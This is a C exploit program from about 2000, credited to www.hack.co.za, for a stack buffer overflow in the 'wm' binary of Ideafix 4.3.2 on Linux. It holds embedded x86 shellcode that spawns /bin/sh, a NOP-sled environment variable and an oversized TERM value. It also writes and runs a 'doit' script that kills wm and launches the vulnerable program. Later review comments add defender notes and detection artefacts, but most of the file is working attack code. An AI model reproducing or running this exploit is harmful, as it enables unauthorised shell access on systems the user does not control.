/*
 * 'Ideafix wm' Exploit 4 Linux.
 */

#include <stdio.h>
#include <stdlib.h>

/*
 * Sizes of the two heap buffers that main() turns into environment strings:
 * TERMSIZE is the length of the "BOF=" string (later copied into TERM by the
 * generated script), HUEVOSIZE the length of the "EGG=" string.
 * Defender note: a TERM value anywhere near 2000 bytes is far outside what a
 * legitimate terminal name needs and is a useful anomaly to alert on.
 */
#define TERMSIZE        2000
#define HUEVOSIZE       5000

/*
 * Opaque x86 machine-code payload that ends with the literal path "/bin/sh".
 * main() copies it byte by byte to the tail of the EGG buffer.
 * NOTE(review): presumably shell-spawning code; it was not verified here.
 * Treat it as hostile and analyse it only in an isolated environment.
 */
char *shell =
  "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

/*
 * Copies the current stack pointer (%esp) into %eax and falls off the end of
 * the function without a return statement.
 * NOTE(review): the value only reaches the caller if the compiler leaves %eax
 * untouched and uses it as the return register; in standard C, using the
 * result of a non-void function that returns nothing is undefined behaviour.
 * The register names make this 32-bit x86 only.
 */
long
esp(void)
{
  __asm__("movl %esp,%eax\n");
}

/*
 * Builds two oversized environment strings and a helper script named "doit",
 * then runs that script.
 *
 *   BOF=  TERMSIZE bytes filled with one repeated stack address from esp().
 *         The script assigns it to TERM before starting the target binary.
 *   EGG=  HUEVOSIZE bytes of 0x90 padding followed by the bytes of `shell`.
 *
 * NOTE(review): the pattern implies the target reads TERM into a fixed-size
 * stack buffer without a length check; the target's source is not shown here,
 * so confirm against the vendor binary or advisory.
 *
 * Defender notes (derived from what this file does):
 *   - The fix belongs in the consumer: any program that reads TERM or other
 *     environment variables must bound the length before copying. The risk
 *     is highest if it runs with elevated privileges, which this file does
 *     not show.
 *   - The repeated address is taken from this process's own stack pointer and
 *     reused as a guess for the child process. Non-executable stacks and
 *     address-space randomisation undermine that assumption.
 *   - Observable artefacts: a file "doit" created in the working directory,
 *     `killall wm` immediately followed by a start of
 *     /usr/local/inter-soft/ideafix-4.3.2/bin/wm, and environment values with
 *     long runs of 0x90 bytes or a multi-kilobyte TERM.
 */
int
main(void)
{

  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int i;


  /* Allocate the two buffers that will become the BOF= and EGG= strings. */
  if ( !(bof = malloc(TERMSIZE)) )
    {
      printf("NoMoreMemory4bof.\n");
      exit(1);
    }

  if ( !(egg = malloc(HUEVOSIZE)) )
    {
      printf("NoMoreMemory4egg.\n");
      exit(1);
    }

  /* Stack pointer of this process, used as the address written into BOF. */
  addr = esp();

  /*
   * Fill bof with copies of addr. The counter advances by 4 per stored long,
   * so the loop assumes sizeof(long) == 4 (see the 32-bit note on esp()).
   */
  addr_ptr = (long *) bof;
  for (i = 0; i < TERMSIZE; i += 4)
    *(addr_ptr++) = addr;

  /* Pad the front of egg with 0x90, the one-byte x86 NOP opcode ... */
  ptr = egg;
  for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++)
    *(ptr++) = 0x90;

  /* ... and append the payload bytes after the padding. */
  for( i = 0; i < strlen(shell); i++)
    *(ptr++) = shell[i];

  /* NUL-terminate both buffers so they are valid C strings. */
  bof[TERMSIZE - 1] = '\0';
  egg[HUEVOSIZE - 1] = '\0';

  /* Overwrite the first four bytes with the NAME= prefix putenv() expects. */
  memcpy(bof, "BOF=", 4);
  memcpy(egg , "EGG=", 4);

  /* Place both strings in this process's environment. */
  putenv(bof);
  putenv(egg);

  /*
   * Write the helper script line by line with shell redirection. ">>"
   * appends, so a "doit" already present in the working directory is
   * extended, not replaced. The script stops any running wm, copies $BOF
   * into TERM and starts the wm binary from the hard-coded Ideafix 4.3.2
   * path.
   */
  system("echo '#!/bin/sh' >> doit");
  system("echo -n '# We kill any instance of wm, set TERM, ' >> doit");
  system("echo 'and run the vulnerable program.' >> doit");
  system("echo '# Bisti [111097]' >> doit");
  system("echo 'killall wm' >> doit");
  system("echo 'TERM=$BOF;export TERM' >> doit");
  system("echo '/usr/local/inter-soft/ideafix-4.3.2/bin/wm' >> doit");

  /* Run the generated script through sh. */
  system("sh ./doit");

}
/*                    www.hack.co.za              [2000]*/